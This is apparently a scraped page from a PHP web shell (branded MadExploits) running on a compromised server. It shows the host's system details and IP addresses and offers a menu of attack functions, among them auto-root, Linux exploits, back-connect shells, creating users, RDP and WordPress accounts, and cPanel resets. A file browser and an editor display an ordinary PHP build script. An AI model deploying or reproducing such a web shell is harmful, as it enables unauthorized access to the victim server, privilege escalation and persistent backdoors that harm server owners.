Linux server.kiran-academy.com 3.10.0-1160.108.1.el7.x86_64 #1 SMP Thu Jan 25 16:17:31 UTC 2024 x86_64
Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
: 194.233.91.196 | : 216.73.216.216
Cant Read [ /etc/named.conf ]
7.4.32
finalho
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
local /
src /
imagick /
docker /
[ HOME SHELL ]
Name
Size
Permission
Action
centos6
[ DIR ]
drwxr-xr-x
centos7
[ DIR ]
drwxr-xr-x
developing
[ DIR ]
drwxr-xr-x
fedora
[ DIR ]
drwxr-xr-x
nixos
[ DIR ]
drwxr-xr-x
repro
[ DIR ]
drwxr-xr-x
testing7_2
[ DIR ]
drwxr-xr-x
testing8_0
[ DIR ]
drwxr-xr-x
installImageMagick.sh
1.78
KB
-rw-r--r--
installPHP.sh
1001
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : installPHP.sh
#!/usr/bin/env bash set -e set -x # git clone https://github.com/php/php-src SRCFILE="php-7.2.11" SRCFILE="php-7.1.24" mkdir -p /var/app/php_src/${SRCFILE} tar -xzf /var/app/php_src/${SRCFILE}.tar.gz -C /var/app/php_src/${SRCFILE} --strip-components=1 cd /var/app/php_src/${SRCFILE} # ./buildconf # ./configure --disable-all --without-pear ./configure \ --without-pear \ --without-sqlite3 \ --without-pdo-sqlite \ --with-openssl \ --enable-mbstring \ --with-curl \ --with-zip # For Mac export PKG_CONFIG_PATH="/opt/homebrew/Cellar/openssl@1.1/1.1.1s/lib/pkgconfig:$PKG_CONFIG_PATH" ./configure \ --without-pear \ --without-sqlite3 \ --without-pdo-sqlite \ --with-openssl \ --enable-mbstring \ --with-curl \ --with-zip \ --without-iconv \ --prefix=/opt/danack \ --exec-prefix=/opt/danack ./configure --with-imagick=/opt/danack make -j 20 make install export TEST_PHP_EXECUTABLE=`which php` # echo "extension=imagick.so" > /usr/local/lib/php.ini
Close